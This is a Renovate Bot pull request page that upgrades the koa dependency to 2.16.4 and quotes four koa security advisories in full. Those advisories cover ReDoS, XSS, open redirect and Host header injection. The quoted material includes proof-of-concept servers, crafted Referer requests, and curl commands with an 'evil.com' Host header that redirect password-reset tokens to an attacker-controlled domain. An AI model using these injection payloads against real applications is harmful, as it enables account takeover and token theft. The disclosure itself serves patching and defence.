jonathan/combine.fm
jonathan/combine.fm
1
1
Fork 0
Code Issues Pull requests Projects Releases Packages 1 Wiki Activity Actions

Update dependency koa to v2.16.4 [SECURITY] #32

Merged
jonathan merged 1 commit from renovate/npm-koa-vulnerability into main 2026-04-20 19:18:53 +00:00
Conversation 0 Commits 1 Files changed 1 +93 -52
renovatebot commented 2026-04-20 18:54:57 +00:00
Contributor
Copy link

This PR contains the following updates:

Package Type Update Change
koa (source) dependencies minor 2.13.02.16.4

Inefficient Regular Expression Complexity in koa

CVE-2025-25200 / GHSA-593f-38f6-jp5m

More information

Details

Summary

Koa uses an evil regex to parse the X-Forwarded-Proto and X-Forwarded-Host HTTP headers. This can be exploited to carry out a Denial-of-Service attack.

PoC

Coming soon.

Impact

This is a Regex Denial-of-Service attack and causes memory exhaustion. The regex should be improved and empty values should not be allowed.

Severity

  • CVSS Score: 9.2 / 10 (Critical)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Koajs vulnerable to Cross-Site Scripting (XSS) at ctx.redirect() function

CVE-2025-32379 / GHSA-x2rg-q646-7m2v

More information

Details

Summary

In koa < 2.16.1 and < 3.0.0-alpha.5, passing untrusted user input to ctx.redirect() even after sanitizing it, may execute javascript code on the user who use the app.

Patches

This issue is patched in 2.16.1 and 3.0.0-alpha.5.

PoC

Coming soon...

Impact
  1. Redirect user to another phishing site
  2. Make request to another endpoint of the application based on user's cookie
  3. Steal user's cookie

Severity

  • CVSS Score: 5.0 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Koa Open Redirect via Referrer Header (User-Controlled)

CVE-2025-8129 / GHSA-jgmv-j7ww-jx2x

More information

Details

Summary

In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target.

Details

on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see:

response.redirect(url, [alt])

Performs a [302] redirect to url.
The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist.

ctx.redirect('back');
ctx.redirect('back', '/index.html');
ctx.redirect('/login');
ctx.redirect('http://google.com');

however, the "back" method is insecure:

  back (alt) {
    const url = this.ctx.get('Referrer') || alt || '/'
    this.redirect(url)
  },

Referrer Header is User-Controlled.

PoC

there is a demo for POC:

const Koa = require('koa')
const serve = require('koa-static')
const Router = require('@&#8203;koa/router')
const path = require('path')

const app = new Koa()
const router = new Router()

// Serve static files from the public directory
app.use(serve(path.join(__dirname, 'public')))

// Define routes
router.get('/test', ctx => {
  ctx.redirect('back', '/index1.html')
})

router.get('/test2', ctx => {
  ctx.redirect('back')
})

router.get('/', ctx => {
  ctx.body = 'Welcome to the home page! Try accessing /test, /test2'
})

app.use(router.routes())
app.use(router.allowedMethods())

const port = 3000
app.listen(port, () => {
  console.log(`Server running at http://localhost:${port}`)
})

Proof Of Concept

GET /test HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close

GET /test2 HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close

image

image

Impact

https://learn.snyk.io/lesson/open-redirect/

Severity

  • CVSS Score: 2.0 / 10 (Low)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Koa has Host Header Injection via ctx.hostname

CVE-2026-27959 / GHSA-7gcc-r8m5-44qm

More information

Details

Summary

Koa's ctx.hostname API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a @ symbol (e.g., evil.com:fake@legitimate.com) is received, ctx.hostname returns evil.com - an attacker-controlled value. Applications using ctx.hostname for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.

Details

The vulnerability exists in Koa's hostname getter in lib/request.js:

// Koa 2.16.1 - lib/request.js
get hostname() {
  const host = this.host;
  if (!host) return '';
  if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal
  return host.split(':', 1)[0];
}

The host getter retrieves the raw header value with HTTP/2 and proxy support:

// Koa 2.16.1 - lib/request.js
get host() {
  const proxy = this.app.proxy;
  let host = proxy && this.get('X-Forwarded-Host');
  if (!host) {
    if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
    if (!host) host = this.get('Host');
  }
  if (!host) return '';
  return host.split(',')[0].trim();
}
The Problem

The parsing logic simply splits on the first : and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.

RFC 3986 Section 3.2.2 defines the host component as:

host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="

The @ character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.

Attack Vector

When an attacker sends:

Host: evil.com:fake@legitimate.com:3000

Koa parses this as:

API Returns Notes
ctx.get('Host') "evil.com:fake@legitimate.com:3000" Raw header
ctx.hostname "evil.com" Attacker-controlled
ctx.host "evil.com:fake@legitimate.com:3000" Raw header value
ctx.origin "http://evil.com:fake@legitimate.com:3000" Protocol + malformed host

The ctx.hostname API returns evil.com because the parser splits on the first : without understanding that evil.com:fake@legitimate.com is a malformed authority component where evil.com:fake would be interpreted as userinfo by a proper URI parser.

Additional Concern: ctx.origin

Koa's ctx.origin property concatenates protocol and host without validation:

// lib/request.js
get origin() {
  return `${this.protocol}://${this.host}`;
}

Applications using ctx.origin for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.

HTTP/2 Consideration

Koa explicitly checks httpVersionMajor >= 2 to read the :authority pseudo-header:

if (this.req.httpVersionMajor >= 2) host = this.get(':authority');

The same vulnerability applies - malformed :authority values containing userinfo would be accepted and parsed identically.

PoC
Setup
// server.js
const Koa = require('koa'); 
const app = new Koa();

// Simulates password reset URL generation (common vulnerable pattern)
app.use(async ctx => {
  if (ctx.path === '/forgot-password') {
    const resetToken = 'abc123securtoken';
    const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;
    
    ctx.body = {
      message: 'Password reset link generated',
      resetUrl: resetUrl,
      debug: {
        rawHost: ctx.get('Host'),
        parsedHostname: ctx.hostname,
        origin: ctx.origin,
        protocol: ctx.protocol
      }
    };
  }
});

app.listen(3000, () => console.log('Server on http://localhost:3000'));
Exploit
curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password
Result
{
  "message": "Password reset link generated",
  "resetUrl": "http://evil.com/reset?token=abc123securtoken",
  "debug": {
    "rawHost": "evil.com:fake@localhost:3000",
    "parsedHostname": "evil.com",
    "origin": "http://evil.com:fake@localhost:3000",
    "protocol": "http"
  }
}

The password reset URL points to evil.com instead of the legitimate server. In a real attack:

  1. Attacker requests password reset for victim's email with malicious Host header
  2. Server generates reset link using ctx.hostnamehttps://evil.com/reset?token=SECRET
  3. Victim receives email with poisoned link
  4. Victim clicks link, token is sent to attacker's server
  5. Attacker uses token to reset victim's password
Additional Test Cases

##### Basic injection
curl -H "Host: evil.com:x@legitimate.com" http://localhost:3000/forgot-password

##### Result: hostname = "evil.com"

##### With port preservation attempt
curl -H "Host: evil.com:443@&#8203;legitimate.com:3000" http://localhost:3000/forgot-password  

##### Result: hostname = "evil.com"

##### Unicode/encoded variations
curl -H "Host: evil.com:x%40legitimate.com" http://localhost:3000/forgot-password

##### Result: hostname = "evil.com"
Deployment Consideration

For this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:

  1. No reverse proxy - Application directly exposed to internet
  2. Misconfigured proxy - Proxy doesn't override/validate Host header
  3. Proxy trust enabled (app.proxy = true) - X-Forwarded-Host can be injected
  4. Default virtual host - Server is the catch-all for unrecognized Host headers
Impact
Vulnerability Type
  • CWE-20: Improper Input Validation
  • CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax
Attack Scenarios

1. Password Reset Poisoning (High Severity)

  • Attacker hijacks password reset tokens by poisoning reset URLs
  • Requires victim to click link in email
  • Results in account takeover

2. Email Verification Bypass

  • Attacker poisons email verification links
  • Can verify attacker-controlled email on victim accounts

3. OAuth/SSO Callback Manipulation

  • Applications using ctx.hostname for OAuth redirect URIs
  • Attacker redirects OAuth callbacks to malicious server
  • Results in token theft

4. Web Cache Poisoning

  • If responses are cached without Host in cache key
  • Poisoned URLs served to all users
  • Persistent XSS/phishing via cached responses

5. Server-Side Request Forgery (SSRF)

  • Internal routing decisions based on ctx.hostname
  • Attacker manipulates which backend receives requests
Who Is Impacted
  • Direct impact: Any Koa application using ctx.hostname or ctx.origin for URL generation without additional validation
  • Common patterns: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

koajs/koa (koa)

v2.16.4

Compare Source

What's Changed

v2.16.3

Compare Source

What's Changed

Full Changelog: https://github.com/koajs/koa/compare/v2.16.2...v2.16.3

v2.16.2

Compare Source

What's Changed

Full Changelog: https://github.com/koajs/koa/compare/v2.16.1...v2.16.2

v2.16.1

Compare Source

fix: don't render redirect values in anchor ref

v2.16.0

Compare Source

This is a backported release to fix core underlying issue with HEAD requests when using http2.createSecureServer. See discussion at #​1593 and #​1547.

  • fix missing cleanup, if response socket is no longer writeable (issue 1547) (#​1593) 399cb6b

v2.15.4

Compare Source

Full Changelog: https://github.com/koajs/koa/compare/2.15.3...2.15.4

Fix: avoid redos on host and protocol getter, see https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m

v2.15.3

Compare Source

v2.15.2

Compare Source

v2.15.1

Compare Source

v2.15.0

Compare Source

v2.14.2

Compare Source

v2.14.1

Compare Source

v2.14.0

Compare Source

v2.13.4

Compare Source

v2.13.3

Compare Source

v2.13.2

Compare Source

v2.13.1

Compare Source

==================

fixes

others

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [koa](https://koajs.com) ([source](https://github.com/koajs/koa)) | dependencies | minor | [`2.13.0` → `2.16.4`](https://renovatebot.com/diffs/npm/koa/2.13.0/2.16.4) | --- ### Inefficient Regular Expression Complexity in koa [CVE-2025-25200](https://nvd.nist.gov/vuln/detail/CVE-2025-25200) / [GHSA-593f-38f6-jp5m](https://github.com/advisories/GHSA-593f-38f6-jp5m) <details> <summary>More information</summary> #### Details ##### Summary Koa uses an evil regex to parse the `X-Forwarded-Proto` and `X-Forwarded-Host` HTTP headers. This can be exploited to carry out a Denial-of-Service attack. ##### PoC Coming soon. ##### Impact This is a Regex Denial-of-Service attack and causes memory exhaustion. The regex should be improved and empty values should not be allowed. #### Severity - CVSS Score: 9.2 / 10 (Critical) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H` #### References - [https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m](https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m) - [https://nvd.nist.gov/vuln/detail/CVE-2025-25200](https://nvd.nist.gov/vuln/detail/CVE-2025-25200) - [https://github.com/koajs/koa/commit/5054af6e31ffd451a4151a1fe144cef6e5d0d83c](https://github.com/koajs/koa/commit/5054af6e31ffd451a4151a1fe144cef6e5d0d83c) - [https://github.com/koajs/koa/commit/5f294bb1c7c8d9c61904378d250439a321bffd32](https://github.com/koajs/koa/commit/5f294bb1c7c8d9c61904378d250439a321bffd32) - [https://github.com/koajs/koa/commit/93fe903fc966635a991bcf890cfc3427d33a1a08](https://github.com/koajs/koa/commit/93fe903fc966635a991bcf890cfc3427d33a1a08) - [https://github.com/koajs/koa](https://github.com/koajs/koa) - [https://github.com/koajs/koa/releases/tag/2.15.4](https://github.com/koajs/koa/releases/tag/2.15.4) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-593f-38f6-jp5m) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Koajs vulnerable to Cross-Site Scripting (XSS) at ctx.redirect() function [CVE-2025-32379](https://nvd.nist.gov/vuln/detail/CVE-2025-32379) / [GHSA-x2rg-q646-7m2v](https://github.com/advisories/GHSA-x2rg-q646-7m2v) <details> <summary>More information</summary> #### Details ##### Summary In koa < 2.16.1 and < 3.0.0-alpha.5, passing untrusted user input to ctx.redirect() even after sanitizing it, may execute javascript code on the user who use the app. ##### Patches This issue is patched in 2.16.1 and 3.0.0-alpha.5. ##### PoC Coming soon... ##### Impact 1. Redirect user to another phishing site 2. Make request to another endpoint of the application based on user's cookie 3. Steal user's cookie #### Severity - CVSS Score: 5.0 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L` #### References - [https://github.com/koajs/koa/security/advisories/GHSA-x2rg-q646-7m2v](https://github.com/koajs/koa/security/advisories/GHSA-x2rg-q646-7m2v) - [https://nvd.nist.gov/vuln/detail/CVE-2025-32379](https://nvd.nist.gov/vuln/detail/CVE-2025-32379) - [https://github.com/koajs/koa/commit/ff25eb4a7f2392df46481fe86355161067687312](https://github.com/koajs/koa/commit/ff25eb4a7f2392df46481fe86355161067687312) - [https://github.com/koajs/koa](https://github.com/koajs/koa) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-x2rg-q646-7m2v) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Koa Open Redirect via Referrer Header (User-Controlled) [CVE-2025-8129](https://nvd.nist.gov/vuln/detail/CVE-2025-8129) / [GHSA-jgmv-j7ww-jx2x](https://github.com/advisories/GHSA-jgmv-j7ww-jx2x) <details> <summary>More information</summary> #### Details ##### Summary In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target. ##### Details on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see: **response.redirect(url, [alt])** ``` Performs a [302] redirect to url. The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist. ctx.redirect('back'); ctx.redirect('back', '/index.html'); ctx.redirect('/login'); ctx.redirect('http://google.com'); ``` however, the "back" method is insecure: - https://github.com/koajs/koa/blob/master/lib/response.js#L322 ``` back (alt) { const url = this.ctx.get('Referrer') || alt || '/' this.redirect(url) }, ``` Referrer Header is User-Controlled. ##### PoC **there is a demo for POC:** ``` const Koa = require('koa') const serve = require('koa-static') const Router = require('@&#8203;koa/router') const path = require('path') const app = new Koa() const router = new Router() // Serve static files from the public directory app.use(serve(path.join(__dirname, 'public'))) // Define routes router.get('/test', ctx => { ctx.redirect('back', '/index1.html') }) router.get('/test2', ctx => { ctx.redirect('back') }) router.get('/', ctx => { ctx.body = 'Welcome to the home page! Try accessing /test, /test2' }) app.use(router.routes()) app.use(router.allowedMethods()) const port = 3000 app.listen(port, () => { console.log(`Server running at http://localhost:${port}`) }) ``` **Proof Of Concept** ``` GET /test HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close GET /test2 HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close ``` ![image](https://github.com/user-attachments/assets/03d1e61b-df97-4b42-a0c4-437bd17144db) ![image](https://github.com/user-attachments/assets/f4e076e0-3853-4b7a-b4c0-bddf5b67631a) ##### Impact https://learn.snyk.io/lesson/open-redirect/ #### Severity - CVSS Score: 2.0 / 10 (Low) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P` #### References - [https://github.com/koajs/koa/security/advisories/GHSA-jgmv-j7ww-jx2x](https://github.com/koajs/koa/security/advisories/GHSA-jgmv-j7ww-jx2x) - [https://nvd.nist.gov/vuln/detail/CVE-2025-54420](https://nvd.nist.gov/vuln/detail/CVE-2025-54420) - [https://github.com/koajs/koa/issues/1892](https://github.com/koajs/koa/issues/1892) - [https://github.com/koajs/koa/issues/1892#issue-3213028583](https://github.com/koajs/koa/issues/1892#issue-3213028583) - [https://github.com/koajs/koa/commit/422c551c63d00f24e2bbbdf492f262a5935bb1f0](https://github.com/koajs/koa/commit/422c551c63d00f24e2bbbdf492f262a5935bb1f0) - [https://github.com/koajs/koa](https://github.com/koajs/koa) - [https://vuldb.com/?ctiid.317514](https://vuldb.com/?ctiid.317514) - [https://vuldb.com/?id.317514](https://vuldb.com/?id.317514) - [https://vuldb.com/?submit.619741](https://vuldb.com/?submit.619741) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-jgmv-j7ww-jx2x) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Koa has Host Header Injection via ctx.hostname [CVE-2026-27959](https://nvd.nist.gov/vuln/detail/CVE-2026-27959) / [GHSA-7gcc-r8m5-44qm](https://github.com/advisories/GHSA-7gcc-r8m5-44qm) <details> <summary>More information</summary> #### Details ##### Summary Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. ##### Details The vulnerability exists in Koa's hostname getter in `lib/request.js`: ```javascript // Koa 2.16.1 - lib/request.js get hostname() { const host = this.host; if (!host) return ''; if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal return host.split(':', 1)[0]; } ``` The `host` getter retrieves the raw header value with HTTP/2 and proxy support: ```javascript // Koa 2.16.1 - lib/request.js get host() { const proxy = this.app.proxy; let host = proxy && this.get('X-Forwarded-Host'); if (!host) { if (this.req.httpVersionMajor >= 2) host = this.get(':authority'); if (!host) host = this.get('Host'); } if (!host) return ''; return host.split(',')[0].trim(); } ``` ##### The Problem The parsing logic simply splits on the first `:` and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2. **RFC 3986 Section 3.2.2** defines the host component as: ``` host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "=" ``` The `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component. ##### Attack Vector When an attacker sends: ``` Host: evil.com:fake@legitimate.com:3000 ``` Koa parses this as: | API | Returns | Notes | |-----|---------|-------| | `ctx.get('Host')` | `"evil.com:fake@legitimate.com:3000"` | Raw header | | `ctx.hostname` | `"evil.com"` | **Attacker-controlled** | | `ctx.host` | `"evil.com:fake@legitimate.com:3000"` | Raw header value | | `ctx.origin` | `"http://evil.com:fake@legitimate.com:3000"` | Protocol + malformed host | The `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser. ##### Additional Concern: `ctx.origin` Koa's `ctx.origin` property concatenates protocol and host without validation: ```javascript // lib/request.js get origin() { return `${this.protocol}://${this.host}`; } ``` Applications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo. ##### HTTP/2 Consideration Koa explicitly checks `httpVersionMajor >= 2` to read the `:authority` pseudo-header: ```javascript if (this.req.httpVersionMajor >= 2) host = this.get(':authority'); ``` The same vulnerability applies - malformed `:authority` values containing userinfo would be accepted and parsed identically. ##### PoC ##### Setup ```javascript // server.js const Koa = require('koa'); const app = new Koa(); // Simulates password reset URL generation (common vulnerable pattern) app.use(async ctx => { if (ctx.path === '/forgot-password') { const resetToken = 'abc123securtoken'; const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`; ctx.body = { message: 'Password reset link generated', resetUrl: resetUrl, debug: { rawHost: ctx.get('Host'), parsedHostname: ctx.hostname, origin: ctx.origin, protocol: ctx.protocol } }; } }); app.listen(3000, () => console.log('Server on http://localhost:3000')); ``` ##### Exploit ```bash curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password ``` ##### Result ```json { "message": "Password reset link generated", "resetUrl": "http://evil.com/reset?token=abc123securtoken", "debug": { "rawHost": "evil.com:fake@localhost:3000", "parsedHostname": "evil.com", "origin": "http://evil.com:fake@localhost:3000", "protocol": "http" } } ``` The password reset URL points to `evil.com` instead of the legitimate server. In a real attack: 1. Attacker requests password reset for victim's email with malicious Host header 2. Server generates reset link using `ctx.hostname` → `https://evil.com/reset?token=SECRET` 3. Victim receives email with poisoned link 4. Victim clicks link, token is sent to attacker's server 5. Attacker uses token to reset victim's password ##### Additional Test Cases ```bash ##### Basic injection curl -H "Host: evil.com:x@legitimate.com" http://localhost:3000/forgot-password ##### Result: hostname = "evil.com" ##### With port preservation attempt curl -H "Host: evil.com:443@&#8203;legitimate.com:3000" http://localhost:3000/forgot-password ##### Result: hostname = "evil.com" ##### Unicode/encoded variations curl -H "Host: evil.com:x%40legitimate.com" http://localhost:3000/forgot-password ##### Result: hostname = "evil.com" ``` ##### Deployment Consideration For this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when: 1. **No reverse proxy** - Application directly exposed to internet 2. **Misconfigured proxy** - Proxy doesn't override/validate Host header 3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected 4. **Default virtual host** - Server is the catch-all for unrecognized Host headers ##### Impact ##### Vulnerability Type - CWE-20: Improper Input Validation - CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax ##### Attack Scenarios **1. Password Reset Poisoning (High Severity)** - Attacker hijacks password reset tokens by poisoning reset URLs - Requires victim to click link in email - Results in account takeover **2. Email Verification Bypass** - Attacker poisons email verification links - Can verify attacker-controlled email on victim accounts **3. OAuth/SSO Callback Manipulation** - Applications using `ctx.hostname` for OAuth redirect URIs - Attacker redirects OAuth callbacks to malicious server - Results in token theft **4. Web Cache Poisoning** - If responses are cached without Host in cache key - Poisoned URLs served to all users - Persistent XSS/phishing via cached responses **5. Server-Side Request Forgery (SSRF)** - Internal routing decisions based on `ctx.hostname` - Attacker manipulates which backend receives requests ##### Who Is Impacted - **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation - **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` #### References - [https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm](https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm) - [https://nvd.nist.gov/vuln/detail/CVE-2026-27959](https://nvd.nist.gov/vuln/detail/CVE-2026-27959) - [https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df](https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df) - [https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb](https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb) - [https://github.com/koajs/koa](https://github.com/koajs/koa) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-7gcc-r8m5-44qm) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>koajs/koa (koa)</summary> ### [`v2.16.4`](https://github.com/koajs/koa/releases/tag/v2.16.4) [Compare Source](https://github.com/koajs/koa/compare/v2.16.3...v2.16.4) #### What's Changed - fix(security): Host Header Injection via `ctx.hostname` by [@&#8203;killagu](https://github.com/killagu) <https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm> ### [`v2.16.3`](https://github.com/koajs/koa/releases/tag/v2.16.3) [Compare Source](https://github.com/koajs/koa/compare/v2.16.2...v2.16.3) #### What's Changed - fix: normalize referer before redirect by [@&#8203;fengmk2](https://github.com/fengmk2) in [#&#8203;1909](https://github.com/koajs/koa/pull/1909) **Full Changelog**: <https://github.com/koajs/koa/compare/v2.16.2...v2.16.3> ### [`v2.16.2`](https://github.com/koajs/koa/releases/tag/v2.16.2) [Compare Source](https://github.com/koajs/koa/compare/v2.16.1...v2.16.2) #### What's Changed - fix: only allow back redirect to the same origin referer by [@&#8203;fengmk2](https://github.com/fengmk2) in [#&#8203;1898](https://github.com/koajs/koa/pull/1898) **Full Changelog**: <https://github.com/koajs/koa/compare/v2.16.1...v2.16.2> ### [`v2.16.1`](https://github.com/koajs/koa/releases/tag/v2.16.1) [Compare Source](https://github.com/koajs/koa/compare/v2.16.0...v2.16.1) fix: don't render redirect values in anchor ref ### [`v2.16.0`](https://github.com/koajs/koa/releases/tag/2.16.0) [Compare Source](https://github.com/koajs/koa/compare/2.15.4...v2.16.0) This is a backported release to fix core underlying issue with `HEAD` requests when using `http2.createSecureServer`. See discussion at [#&#8203;1593](https://github.com/koajs/koa/pull/1593) and [#&#8203;1547](https://github.com/koajs/koa/issues/1547). - fix missing cleanup, if response socket is no longer writeable (issue 1547) ([#&#8203;1593](https://github.com/koajs/koa/pull/1593)) [`399cb6b`](https://github.com/koajs/koa/commit/399cb6b0dd2104224c0ef0ce8e92f84e4f7faf42) ### [`v2.15.4`](https://github.com/koajs/koa/releases/tag/2.15.4) [Compare Source](https://github.com/koajs/koa/compare/2.15.3...2.15.4) **Full Changelog**: <https://github.com/koajs/koa/compare/2.15.3...2.15.4> Fix: avoid redos on host and protocol getter, see <https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m> ### [`v2.15.3`](https://github.com/koajs/koa/compare/2.15.2...2.15.3) [Compare Source](https://github.com/koajs/koa/compare/2.15.2...2.15.3) ### [`v2.15.2`](https://github.com/koajs/koa/compare/2.15.1...2.15.2) [Compare Source](https://github.com/koajs/koa/compare/2.15.1...2.15.2) ### [`v2.15.1`](https://github.com/koajs/koa/compare/2.15.0...2.15.1) [Compare Source](https://github.com/koajs/koa/compare/2.15.0...2.15.1) ### [`v2.15.0`](https://github.com/koajs/koa/compare/2.14.2...2.15.0) [Compare Source](https://github.com/koajs/koa/compare/2.14.2...2.15.0) ### [`v2.14.2`](https://github.com/koajs/koa/compare/2.14.1...2.14.2) [Compare Source](https://github.com/koajs/koa/compare/2.14.1...2.14.2) ### [`v2.14.1`](https://github.com/koajs/koa/compare/2.14.0...2.14.1) [Compare Source](https://github.com/koajs/koa/compare/2.14.0...2.14.1) ### [`v2.14.0`](https://github.com/koajs/koa/compare/2.13.4...2.14.0) [Compare Source](https://github.com/koajs/koa/compare/2.13.4...2.14.0) ### [`v2.13.4`](https://github.com/koajs/koa/compare/2.13.3...2.13.4) [Compare Source](https://github.com/koajs/koa/compare/2.13.3...2.13.4) ### [`v2.13.3`](https://github.com/koajs/koa/compare/2.13.2...2.13.3) [Compare Source](https://github.com/koajs/koa/compare/2.13.2...2.13.3) ### [`v2.13.2`](https://github.com/koajs/koa/compare/2.13.1...2.13.2) [Compare Source](https://github.com/koajs/koa/compare/2.13.1...2.13.2) ### [`v2.13.1`](https://github.com/koajs/koa/blob/HEAD/History.md#2131--2021-01-04) [Compare Source](https://github.com/koajs/koa/compare/2.13.0...2.13.1) \================== **fixes** - \[[`b5472f4`](http://github.com/koajs/koa/commit/b5472f4cbb87349becae36b4a9ad5f76a825abb8)] - fix: make ESM transpiled CommonJS play nice for TS folks, fix [#&#8203;1513](https://github.com/koajs/koa/issues/1513) ([#&#8203;1518](https://github.com/koajs/koa/issues/1518)) (miwnwski <<m@iwnw.ski>>) - \[[`68d97d6`](http://github.com/koajs/koa/commit/68d97d69e4536065504bf9ef1e348a66b3f35709)] - fix: fixed order of vulnerability disclosure addresses (niftylettuce <<niftylettuce@gmail.com>>) **others** - \[[`b4398f5`](http://github.com/koajs/koa/commit/b4398f5d68f9546167419f394a686afdcb5e10e2)] - correct verb tense in doc ([#&#8203;1512](https://github.com/koajs/koa/issues/1512)) (Matan Shavit <<71092861+matanshavit@users.noreply.github.com>>) - \[[`39e1a5a`](http://github.com/koajs/koa/commit/39e1a5a380aa2bbc4e2d164e8e4bf37cfd512516)] - fixed multiple grammatical errors in docs. ([#&#8203;1497](https://github.com/koajs/koa/issues/1497)) (Hridayesh Sharma <<vyasriday7@&#8203;gmail.com>>) - \[[`aeb5d19`](http://github.com/koajs/koa/commit/aeb5d1984dcc5f8e3386f8f9724807ae6f3aa1c4)] - docs: added <niftylettuce@gmail.com> to vulnerability disclosure (niftylettuce <<niftylettuce@gmail.com>>) - 